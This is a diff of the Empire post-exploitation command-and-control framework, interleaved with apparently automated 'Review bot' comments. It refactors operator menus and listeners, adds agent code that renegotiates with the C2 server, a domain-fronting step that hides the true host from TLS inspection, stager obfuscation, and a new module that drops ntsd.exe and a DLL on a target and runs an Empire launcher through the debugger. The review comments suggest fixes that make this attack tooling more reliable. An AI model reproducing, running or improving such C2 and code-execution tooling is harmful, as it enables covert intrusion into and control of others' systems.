@ -1596,7 +1637,6 @@ class PowerShellAgentMenu(cmd.Cmd):
agent = self.mainMenu.agents.get_agent_db(self.sessionID)
messages.display_agent(agent)
def do_exit(self, line):
"Task agent to exit."
@ -1709,7 +1749,6 @@ class PowerShellAgentMenu(cmd.Cmd):
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command)
# update the agent log
msg = "Tasked agent to kill process: " + str(process)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
@ -2285,13 +2324,11 @@ class PowerShellAgentMenu(cmd.Cmd):
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class PythonAgentMenu(cmd.Cmd):
class PythonAgentMenu(SubMenu):
def __init__(self, mainMenu, sessionID):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
@ -2312,9 +2349,6 @@ class PythonAgentMenu(cmd.Cmd):
if results:
print "\n" + results.rstrip('\r\n')
# def preloop(self):
# traceback.print_stack()
def handle_agent_event(self, signal, sender):
"""
Handle agent event signals.
@ -2334,51 +2368,13 @@ class PythonAgentMenu(cmd.Cmd):
if (str(self.sessionID) in signal) or (str(name) in signal):
print helpers.color(signal)
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for c in cmds:
self.stdout.write("%s %s\n" % (c.ljust(17), getattr(self, 'do_' + c).__doc__))
self.stdout.write("\n")
def emptyline(self):
pass
def default(self, line):
"Default handler"
print helpers.color("[!] Command not recognized, use 'help' to see available commands")
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
cmd.Cmd.do_help(self, *args)
SubMenu.do_help(self, *args)
def do_list(self, line):
@ -2703,6 +2699,7 @@ class PythonAgentMenu(cmd.Cmd):
# Strip asterisks added by MainMenu.complete_usemodule()
module = "python/%s" %(line.strip().rstrip("*"))
if module not in self.mainMenu.modules.modules:
print helpers.color("[!] Error: invalid module")
else:
@ -2834,14 +2831,12 @@ class PythonAgentMenu(cmd.Cmd):
# return helpers.complete_path(text,line)
class ListenersMenu(cmd.Cmd):
class ListenersMenu(SubMenu):
"""
The main class used by Empire to drive the 'listener' menu.
"""
def __init__(self, mainMenu):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Listener Commands'
@ -2851,45 +2846,10 @@ class ListenersMenu(cmd.Cmd):
# display all active listeners on menu startup
messages.display_active_listeners(self.mainMenu.listeners.activeListeners)
# def preloop(self):
# traceback.print_stack()
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def emptyline(self):
pass
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_list(self, line):
"List all active listeners (or agents)."
@ -2966,7 +2926,7 @@ class ListenersMenu(cmd.Cmd):
def do_launcher(self, line):
"Generate an initial launcher for a listener."
parts = line.strip().split()
if len(parts) != 2:
print helpers.color("[!] Please enter 'launcher <language> <listenerName>'")
@ -3047,13 +3007,11 @@ class ListenersMenu(cmd.Cmd):
return [s[offs:] for s in names if s.startswith(mline)]
class ListenerMenu(cmd.Cmd):
class ListenerMenu(SubMenu):
def __init__(self, mainMenu, listenerName):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
SubMenu.__init__(self, mainMenu)
if listenerName not in self.mainMenu.listeners.loadedListeners:
print helpers.color("[!] Listener '%s' not currently valid!" % (listenerName))
@ -3067,39 +3025,6 @@ class ListenerMenu(cmd.Cmd):
# set the text prompt
self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > '
def emptyline(self):
"""
If any empty line is entered, do nothing.
"""
pass
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_info(self, line):
"Display listener module options."
messages.display_listener_module(self.listener)
@ -3224,15 +3149,14 @@ class ListenerMenu(cmd.Cmd):
return [s[offs:] for s in languages if s.startswith(mline)]
class ModuleMenu(cmd.Cmd):
class ModuleMenu(SubMenu):
"""
The main class used by Empire to drive the 'module' menu.
"""
def __init__(self, mainMenu, moduleName, agent=None):
cmd.Cmd.__init__(self)
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Module Commands'
self.mainMenu = mainMenu
try:
# get the current module/name
@ -3251,10 +3175,7 @@ class ModuleMenu(cmd.Cmd):
except Exception as e:
print helpers.color("[!] ModuleMenu() init error: %s" % (e))
# def preloop(self):
# traceback.print_stack()
def validate_options(self):
def validate_options(self, prompt):
"Ensure all required module options are completed."
# ensure all 'Required=True' options are filled in
@ -3288,8 +3209,9 @@ class ModuleMenu(cmd.Cmd):
print helpers.color("[!] Error: module needs to run in an elevated context.")
return False
# if the module isn't opsec safe, prompt before running
if ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
# if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued)
if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
try:
choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red"))
if not (choice.lower() != "" and choice.lower()[0] == "y"):
@ -3300,48 +3222,6 @@ class ModuleMenu(cmd.Cmd):
return True
def emptyline(self):
pass
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_list(self, line):
"Lists all active agents (or listeners)."
@ -3352,7 +3232,6 @@ class ModuleMenu(cmd.Cmd):
else:
print helpers.color("[!] Please use 'list [agents/listeners] <modifier>'.")
def do_reload(self, line):
"Reload the current module."
@ -3444,7 +3323,11 @@ class ModuleMenu(cmd.Cmd):
def do_execute(self, line):
"Execute the given Empire module."
if not self.validate_options():
prompt = True
if line == "noprompt":
prompt = False
if not self.validate_options(prompt):
return
if self.moduleName.lower().startswith('external/'):
@ -3634,16 +3517,14 @@ class ModuleMenu(cmd.Cmd):
return [s[offs:] for s in names if s.startswith(mline)]
class StagerMenu(cmd.Cmd):
class StagerMenu(SubMenu):
"""
The main class used by Empire to drive the 'stager' menu.
"""
def __init__(self, mainMenu, stagerName, listener=None):
cmd.Cmd.__init__(self)
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Stager Menu'
self.mainMenu = mainMenu
# get the current stager name
self.stagerName = stagerName
self.stager = self.mainMenu.stagers.stagers[stagerName]
@ -3657,7 +3538,6 @@ class StagerMenu(cmd.Cmd):
listener = self.mainMenu.listeners.get_listener(listener)
self.stager.options['Listener']['Value'] = listener
def validate_options(self):
"Make sure all required stager options are completed."
@ -3674,48 +3554,6 @@ class StagerMenu(cmd.Cmd):
return True
def emptyline(self):
pass
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_list(self, line):
"Lists all active agents (or listeners)."
@ -3783,7 +3621,6 @@ class StagerMenu(cmd.Cmd):
def do_generate(self, line):
"Generate/execute the given Empire stager."
if not self.validate_options():
return
@ -3814,7 +3651,6 @@ class StagerMenu(cmd.Cmd):
os.chmod(savePath, 777)
print "\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath))
else:
print stagerOutput


@ -4,7 +4,7 @@
Listener handling functionality for Empire.
"""
import sys
import fnmatch
import imp
import helpers


@ -200,14 +200,7 @@ def parse_result_packet(packet, offset=0):
taskID = struct.unpack('=H', packet[6+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
if length != '0':
if length % 4:
#padding fix
datapart = packet[12+offset:12+offset+length]
datapart += '=' * (4 - length % 4)
data = base64.b64decode(datapart)
else:
data = base64.b64decode(packet[12+offset:12+offset+length])
#data = base64.b64decode(packet[12+offset:12+offset+length])
data = base64.b64decode(packet[12+offset:12+offset+length])
else:
data = None
remainingData = packet[12+offset+length:]
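Review bot: The live decode `data = base64.b64decode(packet[12+offset:12+offset+length])` is guarded by `if length != '0':`, which compares the int unpacked by `struct.unpack('=L', ...)` with the string `'0'` and is therefore always true, so a zero-length result decodes an empty slice instead of reaching `data = None`; it should read `if length != 0:`. The `#data = base64.b64decode(...)` line directly above it is commented-out code identical to the live line and can be dropped. With the old padding repair gone, a result whose base64 field is not a multiple of four bytes now raises out of `b64decode` (a `TypeError` on Python 2); because this parses agent-supplied bytes on the server, the caller should catch that for the one bad packet rather than let it unwind the handler — I cannot see the caller from here. parse_result_packet begins outside the hunk.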


@ -18,6 +18,7 @@ import fnmatch
import imp
import helpers
import os
import errno
import macholib.MachO
import shutil
import zipfile
@ -443,6 +444,15 @@ class Stagers:
javacode = file.read()
file.close()
javacode = javacode.replace("LAUNCHER",launcherCode)
jarpath = self.mainMenu.installPath+'data/misc/classes/com/installer/apple/'
try:
os.makedirs(jarpath)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
pass
file = open(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.java','w')
file.write(javacode)
file.close()
@ -460,6 +470,7 @@ class Stagers:
return jar
def generate_upload(self, file, path):
script = """
$b64 = "BASE64_BLOB_GOES_HERE"
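Review bot: In the new `os.makedirs(jarpath)` guard the `else: pass` branch after the `raise` is a no-op and can be deleted. The `errno.EEXIST` check also swallows the case where `jarpath` already exists as a regular file, so the following `open(... 'Run.java', 'w')` fails with a less direct error; `if e.errno != errno.EEXIST or not os.path.isdir(jarpath): raise` keeps the intent and surfaces that case. `jarpath` is built by string concatenation on `self.mainMenu.installPath`, which, like the existing `open` calls in this hunk, assumes a trailing slash; `os.path.join` would remove that assumption. The enclosing method starts and ends outside the hunk.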


@ -111,6 +111,16 @@ class Listener:
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
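Review bot: `SlackToken` is a bearer credential but is declared like every other option, so, assuming the common option handling I cannot see from here, it will be printed by `info`/`options` listings and stored alongside the listener's other option values; its description should say so. Suggest `'Description' : 'Your SlackBot API token (secret: shown in listener info and stored with the listener options; use a bot token scoped to the notification channel).'`. A one-line comment above the entry, `# secret: treat like a listener credential`, would also help anyone adding logging or export of these options later. The options dict and the Listener class continue outside the hunk.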


@ -1,5 +1,6 @@
import logging
import base64
import sys
import random
import os
import ssl
@ -107,7 +108,7 @@ class Listener:
'Value' : 'Microsoft-IIS/7.5'
},
'StagerURI' : {
'Description' : 'URI for the stager. Example: stager.php',
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
@ -295,10 +296,11 @@ class Listener:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
@ -494,7 +496,7 @@ class Listener:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
@ -585,7 +587,7 @@ class Listener:
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(code, obfuscationCommand=obfuscationCommand)
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
@ -708,6 +710,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
@ -758,6 +764,10 @@ def send_message(packets=None):
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
@ -884,7 +894,7 @@ def send_message(packets=None):
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
@ -963,7 +973,18 @@ def send_message(packets=None):
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
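Review bot: The TLS-context rewrite replaces `ssl.PROTOCOL_TLSv1_2` with `ssl.PROTOCOL_TLS` / `ssl.PROTOCOL_SSLv23` but never touches `context.options`, so the listener now accepts whatever protocol versions the interpreter's OpenSSL build enables — on older 2.7 builds that can include SSLv3 and TLS 1.0, a downgrade from the previous TLS-1.2-only posture. If the intent is to admit agents that cannot speak TLS 1.2, set the floor explicitly after `context = ssl.SSLContext(proto)`: `context.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3` (and `| ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1` where those agents are not needed; the constants exist on 2.7.9+/3.4+). `pyversion = sys.version_info` is assigned twice in this hunk; the first copy can go. The `# support any version of tls` comment should state the version floor that is actually enforced. The enclosing method continues outside the hunk.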


@ -5,6 +5,7 @@ import os
import ssl
import time
import copy
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response
@ -313,7 +314,7 @@ class Listener:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(randomizedStager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
@ -369,7 +370,7 @@ class Listener:
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(code, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
@ -460,6 +461,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
@ -630,7 +635,17 @@ class Listener:
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
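Review bot: Choosing `ssl.PROTOCOL_TLS`/`ssl.PROTOCOL_SSLv23` without an explicit `context.options` mask leaves the minimum protocol to the interpreter's defaults, which on older 2.7 builds may still admit SSLv3 or TLS 1.0, whereas the code this replaces pinned TLS 1.2; add `context.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3` (plus `ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1` if 1.2 is the real floor) right after `context = ssl.SSLContext(proto)`. The seven-line version sniff on `sys.version_info` can be reduced to `proto = getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)`, which expresses the same fallback and also covers 2.7.x builds that backport the constant. The enclosing method continues outside the hunk.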


@ -451,6 +451,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
@ -498,7 +502,9 @@ def send_message(packets=None):
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
return (HTTPError.code, '')
r#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
except urllib2.URLError as URLerror:
# if the server cannot be reached
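Review bot: `r#if signaled for restaging, exit.` carries a stray `r` before the comment; since this text is part of the Python agent source the listener hands out, every agent built from it evaluates the bare name `r` inside the `HTTPError` branch — a `NameError` unless `r` happens to be bound earlier in the agent, which I cannot see from here — so the line must read `#if signaled for restaging, exit.`. The hunk also grows from 7 to 9 lines while adding three, which suggests `return (HTTPError.code, '')` was removed rather than kept as context; if so, every non-401 HTTP error now falls out of the `except` clause without returning the `(code, data)` tuple the rest of `send_message` expects, and the return should be restored after the `if HTTPError.code == 401:` block. send_message continues outside the hunk.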


@ -419,6 +419,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
@ -466,7 +470,9 @@ def send_message(packets=None):
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
return (HTTPError.code, '')
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
except urllib2.URLError as URLerror:
# if the server cannot be reached
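Review bot: The hunk grows from 7 to 9 lines while adding three, which indicates `return (HTTPError.code, '')` was removed rather than kept above the new `if HTTPError.code == 401:` block; if so, any non-401 HTTP error now falls out of the `except` clause without returning the `(code, data)` tuple the remainder of `send_message` and its caller expect. Keep the 401 exit and restore the return after it: `if HTTPError.code == 401:` / `    sys.exit(0)` / `return (HTTPError.code, '')`. This block is agent-side Python source emitted by the listener, so the regression would land on every agent staged from it; the PowerShell agent in the same hunk renegotiates in place while the Python agent exits the process, and a short comment stating that the asymmetry is intended would save the next reader a question. send_message continues outside the hunk.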


@ -5,6 +5,7 @@ import os
import ssl
import time
import copy
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response
@ -616,7 +617,17 @@ class Listener:
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
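Review bot: This version-sniffing TLS block is a verbatim copy of the one in the other HTTP listeners touched by this commit, so any later hardening has to be repeated per listener; move it into a shared helper (for example `helpers.get_tls_context(certPath)` returning the loaded `SSLContext`) and have each listener call that. Wherever it lives, the block should set a protocol floor, since `ssl.PROTOCOL_TLS`/`ssl.PROTOCOL_SSLv23` with no `context.options` mask accepts whatever the interpreter's OpenSSL build allows, which on older 2.7 builds may include SSLv3 and TLS 1.0 where the replaced code pinned TLS 1.2: `context.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3`. The 2.7.13 check itself reduces to `proto = getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)`. The enclosing method continues outside the hunk.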


@ -88,6 +88,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -72,6 +72,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -0,0 +1,165 @@
from lib.common import helpers
import base64
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Ntsd',
'Author': ['james fitts'],
'Description': ("Use NT Symbolic Debugger to execute Empire launcher code"),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [""]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'UploadPath' : {
'Description' : 'Path to drop dll (C:\Users\Administrator\Desktop).',
'Required' : False,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'BinPath' : {
'Description' : 'Binary to set NTSD to debug.',
'Required' : True,
'Value' : "C:\\Windows\\System32\\calc.exe"
},
'Arch' : {
'Description' : 'Architecture the system is on.',
'Required' : True,
'Value' : 'x64'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
uploadPath = self.options['UploadPath']['Value'].strip()
bin = self.options['BinPath']['Value']
arch = self.options['Arch']['Value']
ntsd_exe_upload_path = uploadPath + "\\" + "ntsd.exe"
ntsd_dll_upload_path = uploadPath + "\\" + "ntsdexts.dll"
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if arch == 'x64':
ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x64.exe"
ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x64.dll"
elif arch == 'x86':
ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x86.exe"
ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x86.dll"
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/code_execution/Invoke-Ntsd.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = ""
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: %s" %(listenerName))
return ''
else:
l = self.mainMenu.stagers.stagers['multi/launcher']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
launcher = l.generate()
if launcher == '':
print helpers.color('[!] Error in launcher generation.')
return ''
else:
launcherCode = launcher.split(' ')[-1]
with open(ntsd_exe, 'rb') as bin_data:
ntsd_exe_data = bin_data.read()
with open(ntsd_dll, 'rb') as bin_data:
ntsd_dll_data = bin_data.read()
exec_write = "Write-Ini %s \"%s\"" % (uploadPath, launcher)
code_exec = "%s\\ntsd.exe -cf %s\\ntsd.ini %s" % (uploadPath, uploadPath, bin)
ntsd_exe_upload = self.mainMenu.stagers.generate_upload(ntsd_exe_data, ntsd_exe_upload_path)
ntsd_dll_upload = self.mainMenu.stagers.generate_upload(ntsd_dll_data, ntsd_dll_upload_path)
script += "\r\n"
script += ntsd_exe_upload
script += ntsd_dll_upload
script += "\r\n"
script += exec_write
script += "\r\n"
# this is to make sure everything was uploaded properly
script += "Start-Sleep -s 5"
script += "\r\n"
script += code_exec
return script
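Review bot: `generate` leaves `ntsd_exe`/`ntsd_dll` unbound when `Arch` is anything other than `x64`/`x86`, so a typo in the option surfaces as a `NameError` at `open(ntsd_exe, 'rb')` instead of a clear message; add `else:` / `print helpers.color("[!] Invalid Arch: %s (expected x64 or x86)" % (arch))` / `return ''` to the `if arch` chain. `UploadPath` is not `Required` yet is the prefix for every dropped file and for the `ntsd.exe -cf` command, so an empty value produces `\ntsd.exe`; either mark it required or return `''` with a message when `uploadPath` is empty. `launcherCode` is computed but never used and `base64` is imported but unused, `bin` shadows the builtin (`bin_path` reads better), and the module-source read would be cleaner as `with open(moduleSource, 'r') as f:` catching `IOError` instead of the bare `except`. Since the module writes two binaries and an `ntsd.ini` to the target's disk, the `'Comments'` list should name those artifacts so operators know what to clean up.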


@ -127,6 +127,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -145,6 +145,6 @@ class Module:
scriptEnd += "; 'Shellcode injected.'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -89,6 +89,6 @@ class Module:
sc = ",0".join(values['Value'].split("\\"))[1:]
scriptEnd += " -" + str(option) + " @(" + sc + ")"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -103,6 +103,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


